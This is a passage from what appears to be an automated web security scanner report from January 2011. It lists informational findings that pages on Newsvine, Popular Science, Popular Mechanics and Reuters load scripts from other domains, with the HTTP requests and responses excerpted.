</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinepolitics&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.567. http://www.polls.newsvine.com/religion previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/religion

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinereligion&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /religion HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinereligion&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.568. http://www.polls.newsvine.com/science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/science

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinescience&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /science HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinescience&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.569. http://www.polls.newsvine.com/sports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/sports

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinesports&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://nbcsports.msnbc.com/js/nbcsports.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /sports HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://nbcsports.msnbc.com/js/nbcsports.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinesports&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://nbcsports.msnbc.com/js/nbcsports.js"></script>
...[SNIP]...

23.570. http://www.polls.newsvine.com/technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/technology

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinetechnology&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /technology HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinetechnology&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.571. http://www.polls.newsvine.com/travel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/travel

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinetravel&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /travel HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinetravel&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.572. http://www.polls.newsvine.com/us-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/us-news

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineusnews&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /us-news HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineusnews&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.573. http://www.polls.newsvine.com/world-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/world-news

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineworldnews&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /world-news HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineworldnews&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.574. http://www.popsci.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popsci.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.jobthread.com/jobs.popsci.com/feeds/jobroll/?num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0
http://edge.quantserve.com/quant.js
http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:22 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com
Last-Modified: Sun, 30 Jan 2011 03:17:46 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=17304
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div id="job-listing-block">
<script type="text/javascript" src="http://edge.jobthread.com/jobs.popsci.com/feeds/jobroll/?num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.575. http://www.popularmechanics.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popularmechanics.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://js.revsci.net/gateway/gw.js?csid=I09839
http://w.sharethis.com/button/sharethis.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: www.popularmechanics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 67327
Content-Type: text/html
Cache-Control: max-age=20
Date: Sun, 30 Jan 2011 03:18:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso
...[SNIP]...
</script>
   <script language="javascript" type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&type=website&buttonText=&embeds=true&post_services=facebook%2Ctwitter%2Cstumbleupon%2Cmyspace%2Cybuzz%2Cgoogle_bmarks%2Cfriendfeed%2Cblogger%2Cdelicious%2Cwordpress%2Cyahoo_bmarks%2Ctypepad%2Cdigg%2Creddit%2Ctechnorati%2Cmixx%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin&headerbg=%235e50a1&linkfg=%235e50a1&headerTitle=SHARE%20POPULAR%20MECHANICS!&offsetLeft=-40&onmouseover=false"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</div>
   <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...

23.576. http://www.reuters.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d821869/2/822749/randm.js
http://cdn.echoenabled.com/clientapps/v2/jquery-pack.js
http://cdn.js-kit.com/scripts/echo-stream.js

Request

GET / HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:18 GMT
Server: Apache
